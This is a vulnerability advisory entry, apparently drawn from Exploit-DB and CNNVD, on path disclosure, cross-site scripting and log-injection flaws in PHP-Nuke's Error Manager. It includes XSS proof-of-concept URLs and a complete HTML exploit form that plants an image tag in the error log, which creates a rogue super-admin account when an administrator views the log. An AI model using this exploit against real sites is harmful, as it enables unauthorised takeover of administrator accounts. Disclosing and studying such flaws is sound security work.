https://www.exploit-db.com/exploits/23845
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-085

PHP-Nuke是一个广为流行的网站创建和管理工具，它可以使用很多数据库软件作为后端，比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。PHP-Nuke包含的错误管理模块存在多个安全问题，远程攻击者可以利用这个漏洞获得敏感路径信息或获得进行验证的敏感信息。1)路径泄露问题问题存在与error.php文件中，提交任意参数给’newlang’，可返回包含应用程序安装路径的敏感信息。2)跨站脚本执行攻击问题存在与error.php文件中，由于对’pagetitle’和’error’参数缺少充分过滤，提交包含恶意脚本代码数据，当目标用户浏览此连接时，可导致敏感信息泄露。3)脚本注入到错误日志中ErrorManager在记录日志错误时会记录引用，请求URI等信息，但没有对HTML标记进行任何过滤，因此攻击者可以注入热仪脚本代码到错误日志，当管理员查看时，可窃取COOKIE敏感信息，或建立管理员帐户。

source: http://www.securityfocus.com/bid/9911/info
 
It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors.
 
These issues may be leveraged to carry out cross-site scripting attacks, reveal information about the application configuration and initiate HTML injection attacks against the affected system.

http://www.example.com/nuke71/error.php?pagetitle=[xss code here]
http://www.example.com/nuke71/error.php?error=>[xss code here]

To leverage the HTML injection issue, write the following html file and use it against the affected web site. Once the admin views the error logs, an admin user will be created on the affected web site.

<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.example.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>

来源:XF
名称:errormanager-error-command-execution(15530)
链接:http://xforce.iss.net/xforce/xfdb/15530
来源:XF
名称:errormanager-error-xss(15529)
链接:http://xforce.iss.net/xforce/xfdb/15529
来源:BID
名称:9911
链接:http://www.securityfocus.com/bid/9911
来源:BUGTRAQ
名称:20040318[waraxe-2004-SA#010-MultiplevulnerabilitiesinErrorManager
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107963064317560&w;=2
来源:OSVDB
名称:4384
链接:http://www.osvdb.org/4384
来源:SECUNIA
名称:11164
链接:http://secunia.com/advisories/11164